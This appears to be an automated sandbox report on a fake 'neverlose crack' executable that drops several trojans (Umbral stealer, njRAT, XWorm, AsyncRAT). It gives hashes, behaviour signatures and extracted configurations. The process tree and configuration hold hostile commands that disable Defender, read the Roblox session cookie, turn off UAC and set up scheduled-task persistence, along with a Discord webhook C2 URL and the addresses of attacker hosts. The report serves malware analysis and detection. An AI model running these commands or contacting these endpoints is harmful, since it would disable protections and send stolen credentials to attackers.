Analysis

  • max time kernel
    30s
  • max time network
    31s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02-09-2024 09:18

General

  • Target

    neverlose crack.exe

  • Size

    295KB

  • MD5

    01cc2b2bcef2f12ab9a10905f999027d

  • SHA1

    c62bb9b1532dc3f8638cc1ab5eb3b5f5185c2b40

  • SHA256

    d51154dab49e7c3199cb9fd75aa5c7f9eb58ed74c8ea5eb40601ee484dc0b578

  • SHA512

    025af3ae3fa059e364ef933cff47327436f08fb18379377caf7e71ced86f2c8adb4f56a79a643f3072c21b06e9e9b97f5945b9bdff1d29e798c6d9a5c3360d5c

  • SSDEEP

    6144:DVOuy8Et9vsiTzIpoOhYyC8M4i7jyVvdOe4BWH5Y5/zu4cCGb19e:bFigGOTCz17jy9Yer6dzIpi

Malware Config

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1273828074898718851/qR9eE6omxJxFL_jVry1J18IsVQ6bHhsk5rGr5VLxyO-92VJHyGPK43BBNMWtaUG56gE2

Extracted

Family

njrat

Version

<- NjRAT 0.7d Horror Edition ->

Botnet

Victim

C2

meeting-compound.gl.at.ply.gg:1504

Mutex

f8ff2d3def0ea5927a14148fb1c0ef4a

Attributes
  • reg_key

    f8ff2d3def0ea5927a14148fb1c0ef4a

  • splitter

    Y262SUCZ4UJJ

Extracted

Family

xworm

C2

meeting-compound.gl.at.ply.gg:44256

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

Extracted

Family

asyncrat

Botnet

Victim

C2

127.0.0.1:1504

127.0.0.1:44256

meeting-compound.gl.at.ply.gg:1504

meeting-compound.gl.at.ply.gg:44256

Attributes
  • delay

    1

  • install

    true

  • install_file

    System.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Detect Umbral payload 2 IoCs
  • Detect Xworm Payload 2 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Xworm

    Xworm is a remote access trojan written in C#.

  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • Async RAT payload 1 IoCs
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 1 IoCs
  • Sets file to hidden 1 TTPs 2 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 4 IoCs
  • Executes dropped EXE 8 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Delays execution with timeout.exe 2 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies registry key 1 TTPs 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\neverlose crack.exe
    "C:\Users\Admin\AppData\Local\Temp\neverlose crack.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:448
    • C:\Users\Admin\AppData\Local\Temp\WizClient.exe
      "C:\Users\Admin\AppData\Local\Temp\WizClient.exe"
      2⤵
      • Checks computer location settings
      • Drops startup file
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1904
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "WizClient" /tr "C:\Users\Admin\AppData\Roaming\WizClient.exe"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:4404
    • C:\Users\Admin\AppData\Local\Temp\INSTALLER1.exe
      "C:\Users\Admin\AppData\Local\Temp\INSTALLER1.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3880
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "System" /tr '"C:\Users\Admin\AppData\Roaming\System.exe"' & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2748
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /tn "System" /tr '"C:\Users\Admin\AppData\Roaming\System.exe"'
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:3716
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp9EC0.tmp.bat""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4104
        • C:\Windows\system32\timeout.exe
          timeout 3
          4⤵
          • Delays execution with timeout.exe
          PID:3724
        • C:\Users\Admin\AppData\Roaming\System.exe
          "C:\Users\Admin\AppData\Roaming\System.exe"
          4⤵
          • Executes dropped EXE
          PID:932
    • C:\Users\Admin\AppData\Local\Temp\Umbral.exe
      "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
      2⤵
      • Drops file in Drivers directory
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4580
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2696
      • C:\Windows\SYSTEM32\attrib.exe
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
        3⤵
        • Views/modifies file attributes
        PID:4672
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1052
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1960
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2116
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3680
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" os get Caption
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3516
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" computersystem get totalphysicalmemory
        3⤵
          PID:3840
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" csproduct get uuid
          3⤵
            PID:3024
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
            3⤵
            • Command and Scripting Interpreter: PowerShell
            PID:548
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic" path win32_VideoController get name
            3⤵
            • Detects videocard installed
            PID:1004
          • C:\Windows\SYSTEM32\cmd.exe
            "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
            3⤵
            • System Network Configuration Discovery: Internet Connection Discovery
            • Suspicious use of WriteProcessMemory
            PID:1972
            • C:\Windows\system32\PING.EXE
              ping localhost
              4⤵
              • System Network Configuration Discovery: Internet Connection Discovery
              • Runs ping.exe
              PID:4524
        • C:\Users\Admin\AppData\Local\Temp\WmZWbh4b.exe
          "C:\Users\Admin\AppData\Local\Temp\WmZWbh4b.exe"
          2⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:524
          • C:\Windows\System32\attrib.exe
            "C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\Exec"
            3⤵
            • Sets file to hidden
            • Views/modifies file attributes
            PID:736
          • C:\Windows\System32\attrib.exe
            "C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\Exec\$77svchost.exe"
            3⤵
            • Sets file to hidden
            • Views/modifies file attributes
            PID:2696
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpF7AE.tmp.bat""
            3⤵
              PID:1188
              • C:\Windows\system32\timeout.exe
                timeout 3
                4⤵
                • Delays execution with timeout.exe
                PID:544
              • C:\Users\Admin\Exec\$77svchost.exe
                "C:\Users\Admin\Exec\$77svchost.exe"
                4⤵
                • Executes dropped EXE
                PID:2116
          • C:\Users\Admin\AppData\Local\Temp\Payload.exe
            "C:\Users\Admin\AppData\Local\Temp\Payload.exe"
            2⤵
            • Checks computer location settings
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4864
            • C:\Users\Admin\AppData\Local\Temp\dllhost.exe
              "C:\Users\Admin\AppData\Local\Temp\dllhost.exe"
              3⤵
              • Drops startup file
              • Executes dropped EXE
              • Adds Run key to start application
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2632
              • C:\Windows\SysWOW64\attrib.exe
                attrib +h "C:\Users\Admin\AppData\Local\Temp\dllhost.exe"
                4⤵
                • System Location Discovery: System Language Discovery
                • Views/modifies file attributes
                PID:4672
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /delete /tn CleanSweepCheck /f
                4⤵
                • System Location Discovery: System Language Discovery
                PID:1512
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /sc minute /mo 1 /tn CleanSweepCheck /tr C:\Users\Admin\AppData\Local\Temp\dllhost.exe
                4⤵
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:3944
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                4⤵
                • System Location Discovery: System Language Discovery
                PID:5036
                • C:\Windows\SysWOW64\reg.exe
                  reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                  5⤵
                  • UAC bypass
                  • System Location Discovery: System Language Discovery
                  • Modifies registry key
                  PID:4008
        • C:\Windows\system32\vssvc.exe
          C:\Windows\system32\vssvc.exe
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4508

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

          Filesize

          2KB

          MD5

          d85ba6ff808d9e5444a4b369f5bc2730

          SHA1

          31aa9d96590fff6981b315e0b391b575e4c0804a

          SHA256

          84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

          SHA512

          8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          948B

          MD5

          1a58f982c18490e622e00d4eb75ace5a

          SHA1

          60c30527b74659ecf09089a5a7c02a1df9a71b65

          SHA256

          4b7f800c0dea209162cc86627983993127eb20e3f8616646c41cb3ce15d9b39d

          SHA512

          ddab516a967783c5951717853aa5b3ef6dd5b442db50092888b2e7f3179fc68120fcde69a08d6ab280740eaadb6eadfc758c3118b52706f869e48ac1aebda480

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          88be3bc8a7f90e3953298c0fdbec4d72

          SHA1

          f4969784ad421cc80ef45608727aacd0f6bf2e4b

          SHA256

          533c8470b41084e40c5660569ebbdb7496520d449629a235e8053e84025f348a

          SHA512

          4fce64e2dacddbc03314048fef1ce356ee2647c14733da121c23c65507eeb8d721d6b690ad5463319b364dc4fa95904ad6ab096907f32918e3406ef438a6ef7c

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          ec79fae4e7c09310ebf4f2d85a33a638

          SHA1

          f2bdd995b12e65e7ed437d228f22223b59e76efb

          SHA256

          e9c4723a5fe34e081c3d2f548a1d472394cc7aa58056fcf44ca542061381243a

          SHA512

          af9dda12f6bb388d826fe03a4a8beed9bda23a978aa55a2af6a43271660ee896a7ee3bcf2c4d2f1e6180902791d8c23560f1c2ec097a501d8c6f4f6c49075625

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          944B

          MD5

          6d42b6da621e8df5674e26b799c8e2aa

          SHA1

          ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

          SHA256

          5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

          SHA512

          53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

        • C:\Users\Admin\AppData\Local\Temp\INSTALLER1.exe

          Filesize

          63KB

          MD5

          6c575ec28ef4f6108f2acf9775938100

          SHA1

          c3b5d9f59b53768817d3c6dd93a49cef5a40a9e2

          SHA256

          609d9f9c8da8f777e17ff1a716c07e39e3b2d7fd76086436cf2e2383fe8bcd8c

          SHA512

          950f48b90492b7f0ac702c2cfd8822eab510819024fbcba2407217280e9d069c39aeae27f4bd6e6ce37efc9de52fad52ad15a07b8ce43c58f43bb5926278ddd5

        • C:\Users\Admin\AppData\Local\Temp\Payload.exe

          Filesize

          54KB

          MD5

          29527eb6dd3c1e2b8dbc17d70ad1fb20

          SHA1

          8fafd2e9914b32797c957f58a1254afc7dccf5af

          SHA256

          dafc09f9798d4c1134845b08749c514a3478ed4a45837e12fd717012ec27c694

          SHA512

          52e315cd12482d8a147e5d810e7fbb116cc15b4163e3015f5d579b0621980a15195a4354528bce24a3aff1e47766d95dea71f09563da8e43c781020006bb0e00

        • C:\Users\Admin\AppData\Local\Temp\Umbral.exe

          Filesize

          229KB

          MD5

          62099472f40d33f1caf73e36e866b9e7

          SHA1

          9d1e27b780ba14d0e41d366d79b0f42d4a782e7e

          SHA256

          f343ca46350a3c48f888be39bf1247fcab2bcd731889fc16828aac5f681edebc

          SHA512

          3356bd93afdff76dfc995b8bba3fc96d772e371c3ae6f289cbdb58cffef4906a5f8c2755152765c8cc96b5fc61e97186e42eceaa5e8619d15e172441c95f9764

        • C:\Users\Admin\AppData\Local\Temp\WizClient.exe

          Filesize

          61KB

          MD5

          d63d40b2af636f58cfbabe878e42f0a7

          SHA1

          3f97fb34eceff4e64cd3adb6f5cb4f1fabaf06ed

          SHA256

          536699ce7a068f324c719b4f429bf0aefb82602fcc18ca4d99d76aa53fbdb19a

          SHA512

          e8d771744ad9b2fc85b6f7c655f0e24bd0e42fa4a6575ed4e3301c325750c6e52dbc0b8565b30adf1303986d026d9a4d6a936a9093be8707a8ddbac7933242b4

        • C:\Users\Admin\AppData\Local\Temp\WmZWbh4b.exe

          Filesize

          40KB

          MD5

          47f267290124f530b9c04563b533db83

          SHA1

          fccb81909c612554fce4303daeffc750a71ee44e

          SHA256

          479db498a032418957c1616b13187402d7f626afa32dd4fcf56313d78ec23eeb

          SHA512

          a81b1ca99fec7a536eabc62f57668e46b832e534ccba43f3ab25a9d33d394745d24bad5f72225244f20be5ddcb44529d72efa31b92bc9e03f34e3b9ddb4f9e3a

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o3rq1k0x.eax.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Local\Temp\tmp9EC0.tmp.bat

          Filesize

          150B

          MD5

          92932316310c9f45b8918e1280f443ba

          SHA1

          e523ff96a9ae51db14080264a902164c960d7ff8

          SHA256

          1e0d4c2f7e2a1c2012a3a03f7a3dbec2cc6a59bcb6e01eded2d9291a51493407

          SHA512

          225ae500b6d80d0003bf92b0bb3c7b73c3a3111a55a443b33943f121104cfe301a401a43ead40e989737a89ac70509e21356ed2bcec0be777a3d5b89ec29222e

        • C:\Users\Admin\AppData\Local\Temp\tmpF7AE.tmp.bat

          Filesize

          143B

          MD5

          ffbbbd2fe007355f0d395439ad158e44

          SHA1

          69cd6727210865ad79e6bbc2fad0bea95a282b53

          SHA256

          f401a0884ad54d85471d29bbfc42de5acd81c1ba76ff97d583f1785e58d8045c

          SHA512

          43712b2cb95e2e1bbc8448436da7fc171d6fe648e64552056638645d7831c5a49a86393f79d46eb6f203d980091e4eeb94ec321ea28a5887d366b6f25ce5702d

        • memory/524-58-0x00000000006B0000-0x00000000006BE000-memory.dmp

          Filesize

          56KB

        • memory/1052-81-0x0000014A66FC0000-0x0000014A66FE2000-memory.dmp

          Filesize

          136KB

        • memory/1904-26-0x00007FFEDC843000-0x00007FFEDC845000-memory.dmp

          Filesize

          8KB

        • memory/1904-40-0x0000000000EC0000-0x0000000000ED6000-memory.dmp

          Filesize

          88KB

        • memory/3880-63-0x00007FFEDC840000-0x00007FFEDD301000-memory.dmp

          Filesize

          10.8MB

        • memory/3880-70-0x00007FFEDC840000-0x00007FFEDD301000-memory.dmp

          Filesize

          10.8MB

        • memory/3880-53-0x0000000000BF0000-0x0000000000C06000-memory.dmp

          Filesize

          88KB

        • memory/4580-98-0x000002512A840000-0x000002512A8B6000-memory.dmp

          Filesize

          472KB

        • memory/4580-101-0x000002512A7C0000-0x000002512A7DE000-memory.dmp

          Filesize

          120KB

        • memory/4580-99-0x000002512A7F0000-0x000002512A840000-memory.dmp

          Filesize

          320KB

        • memory/4580-138-0x000002512A8D0000-0x000002512A8DA000-memory.dmp

          Filesize

          40KB

        • memory/4580-139-0x000002512A910000-0x000002512A922000-memory.dmp

          Filesize

          72KB

        • memory/4580-47-0x0000025110110000-0x0000025110150000-memory.dmp

          Filesize

          256KB

        • memory/4580-166-0x00007FFEDC840000-0x00007FFEDD301000-memory.dmp

          Filesize

          10.8MB

        • memory/4580-61-0x00007FFEDC840000-0x00007FFEDD301000-memory.dmp

          Filesize

          10.8MB